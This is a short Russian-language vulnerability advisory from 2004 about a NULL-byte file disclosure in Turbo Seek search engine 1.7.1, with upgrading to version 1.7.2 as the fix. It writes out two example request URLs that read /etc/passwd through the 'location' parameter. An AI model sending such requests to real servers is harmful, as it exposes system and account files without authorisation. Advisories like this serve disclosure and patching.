Security Lab

Просмотр произвольных файлов в Turbo Seek search engine

Дата публикации:13.09.2004
Всего просмотров:1072
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Turbo Seek search engine 1.7.1 и более ранние версии

Описание: Уязвимость обнаружена в Turbo Seek search engine. Удаленный пользователь может просматривать содержание файлов на целевом сервере.

Удаленный пользователь может запросить URL с именем файла, за которым следует NULL байт (‘%00’), чтобы заставить систему отобразить содержание запрашиваемого файла:

/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
/cgi-bin /tseekdir.cgi?id=799&location=/etc/passwd%00

URL производителя: http://www.focalmedia.net/index_tb.html

Решение:Установите обновленную версию программы (1.7.2): http://www.focalmedia.net/tbdownload.html

Ссылки: Search Engine & Directory by Turbo Seek